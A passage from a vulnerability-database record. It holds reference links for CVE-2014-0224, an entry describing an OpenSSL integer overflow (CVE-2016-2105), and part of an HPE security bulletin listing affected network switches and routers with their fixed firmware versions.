"https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?spf_p.tpst=kbdocdisplay\u0026spf_p.prp_kbdocdisplay=wsrp-navigationalstate%3ddocid%253demr_na-c04406535-1%257cdoclocale%253d%" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04425253" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04595094" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05301946" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04336637" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001840" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181215" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678356" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680546" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680511,swg21680439,swg21680673,swg21680546" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg24037729" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095940" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678413" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680706,swg21680707,nas8n1020200,swg21680511,swg21680439,swg21680673,swg21680546" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680673,swg21680546" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680707,nas8n1020200,swg21680511,swg21680439,swg21680673,swg21680546" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004830" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676889" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676673" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678660" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676041" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680439,swg21680673,swg21680546" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676128" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677891" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676536" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095910" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/33a01-5228bdf5d027e/cert_security_mini-_bulletin_xrx15ao_for_cq8570-cq8870_v1-0.pdf" }, { "trust": 0.3, "url": "http://www.novell.com/support/kb/doc.php?id=7015158" }, { "trust": 0.3, "url": "http://securityadvisories.paloaltonetworks.com/home/detail/23?aspxautodetectcookiesupport=1" }, { "trust": 0.3, "url": "http://www.freebsd.org/security/advisories/freebsd-sa-14:14.openssl.asc" }, { "trust": 0.3, "url": "https://bto.bluecoat.com/security-advisory/sa80" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181079" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181566" }, { "trust": 0.3, "url": "https://library.netapp.com/ecm/ecm_get_file/ecmp1636026" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020200" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676356" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676276" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676786" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-0625.html" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-0629.html" }, { "trust": 0.3, "url": "http://forums.alienvault.com/discussion/3054/security-advisory-alienvault-v4-10-0-addresses-several-vulnerabilities" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-345106.htm" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676793" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021009" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676840" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677225" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682398" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095738" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020163" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21683336" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678104" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682023" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021064" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682026" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682025" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682024" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677080" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676877" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095841" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21690128" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004678" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004824" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004690" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676542" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676543" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004744" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676333" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678289" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004695" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676708" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676505" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03b" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03c" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03f" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020976" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020952" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://googlechromereleases.blogspot.com/2014/06/stable-channel-update-for-chrome-os.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001842" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001839" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004821" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004670" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=ssg1s1004671" }, { "trust": 0.3, "url": "http://www.ubuntu.com/usn/usn-2232-4/" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://winscp.net/eng/docs/history#5.5.4" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3470" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0198" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5298" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00073" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00074" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00070" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00076" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00079" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00071" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00075" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00078" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00072" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/hpcit_00077" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2232-3" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2232-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.6" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1332643" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.16" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.19" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3470" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-5298" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0221" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0198" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0224" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0195" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/km01028458" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/km01020441" }, { "trust": 0.1, "url": "http://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=c03536" }, { "trust": 0.1, "url": "https://www.hp.com" } ], "sources": [ { "db": "BID", "id": "67899" }, { "db": "PACKETSTORM", "id": "127936" }, { "db": "PACKETSTORM", "id": "127166" }, { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "127422" }, { "db": "PACKETSTORM", "id": "127403" }, { "db": "PACKETSTORM", "id": "127190" }, { "db": "PACKETSTORM", "id": "128345" }, { "db": "CNNVD", "id": "CNNVD-201406-080" }, { "db": "NVD", "id": "CVE-2014-0224" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-0224" }, { "db": "BID", "id": "67899" }, { "db": "PACKETSTORM", "id": "127936" }, { "db": "PACKETSTORM", "id": "127166" }, { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "127422" }, { "db": "PACKETSTORM", "id": "127403" }, { "db": "PACKETSTORM", "id": "127190" }, { "db": "PACKETSTORM", "id": "128345" }, { "db": "CNNVD", "id": "CNNVD-201406-080" }, { "db": "NVD", "id": "CVE-2014-0224" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-06-05T00:00:00", "db": "VULMON", "id": "CVE-2014-0224" }, { "date": "2014-06-05T00:00:00", "db": "BID", "id": "67899" }, { "date": "2014-08-20T15:18:26", "db": "PACKETSTORM", "id": "127936" }, { "date": "2014-06-24T00:52:51", "db": "PACKETSTORM", "id": "127166" }, { "date": "2014-07-28T20:36:25", "db": "PACKETSTORM", "id": "127630" }, { "date": "2014-07-11T21:05:34", "db": "PACKETSTORM", "id": "127422" }, { "date": "2014-07-09T17:11:19", "db": "PACKETSTORM", "id": "127403" }, { "date": "2014-06-24T01:45:14", "db": "PACKETSTORM", "id": "127190" }, { "date": "2014-09-22T16:56:00", "db": "PACKETSTORM", "id": "128345" }, { "date": "2014-06-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201406-080" }, { "date": "2014-06-05T21:55:07.817000", "db": "NVD", "id": "CVE-2014-0224" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2014-0224" }, { "date": "2017-10-19T03:03:00", "db": "BID", "id": "67899" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201406-080" }, { "date": "2023-11-07T02:18:13.190000", "db": "NVD", "id": "CVE-2014-0224" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "127403" }, { "db": "PACKETSTORM", "id": "128345" }, { "db": "CNNVD", "id": "CNNVD-201406-080" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL Encryption problem vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201406-080" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "encryption problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201406-080" } ], "trust": 0.6 } }
var-201605-0076
Vulnerability from variot
Integer overflow in the EVP_EncryptUpdate function in crypto/evp/evp_enc.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of data. OpenSSL is prone to an integer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. Following product versions are affected: OpenSSL versions 1.0.2 prior to 1.0.2h are vulnerable. OpenSSL versions 1.0.1 prior to 1.0.1t are vulnerable. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.
Security Fix(es):
- It was discovered that httpd used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementations to configure the proxy for outgoing HTTP requests. After installing the updated packages, the httpd daemon will be restarted automatically. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03756en_us
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: hpesbhf03756en_us Version: 1
HPESBHF03756 rev.1 - HPE Network Products including Comware 7, iMC, and VCX running OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2017-06-05 Last Updated: 2017-06-05
Potential Security Impact: Remote: Denial of Service (DoS), Disclosure of Sensitive Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities with OpenSSL have been addressed for HPE network products including Comware 7, iMC, and VCX. The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS) or disclosure of sensitive information.
References:
- CVE-2016-2105 - Remote Denial of Service (DoS)
- CVE-2016-2106 - Remote Denial of Service (DoS)
- CVE-2016-2107 - Remote disclosure of sensitive information
- CVE-2016-2108 - Remote Denial of Service (DoS)
- CVE-2016-2109 - Remote Denial of Service (DoS)
- CVE-2016-2176 - Remote Denial of Service (DoS)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- VCX Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- Comware v7 (CW7) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- HP Intelligent Management Center (iMC) All versions - Please refer to the RESOLUTION below for a list of updated products.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2016-2105
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2106
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2107
3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CVE-2016-2108
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE-2016-2109
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CVE-2016-2176
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has made the following software updates available to resolve the vulnerabilities in the Comware 7, iMC and VCX products running OpenSSL.
COMWARE 7 Products
- 12500 (Comware 7) - Version: R7377P02
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 10500 (Comware 7) - Version: R7184
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5900/5920 (Comware 7) - Version: R2422P02
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR1000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR2000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR3000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR4000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- VSR (Comware 7) - Version: E0324
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 7900 (Comware 7) - Version: R2152
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5130 (Comware 7) - Version: R3115
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 6125XLG - Version: R2422P02
- HP Network Products
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 6127XLG - Version: R2422P02
- HP Network Products
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- Moonshot - Version: R2432
- HP Network Products
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5700 (Comware 7) - Version: R2422P02
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5930 (Comware 7) - Version: R2422P02
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 1950 (Comware 7) - Version: R3115
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 7500 (Comware 7) - Version: R7184
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5510HI (Comware 7) - Version: R1120P10
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5130HI (Comware 7) - Version: R1120P10
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
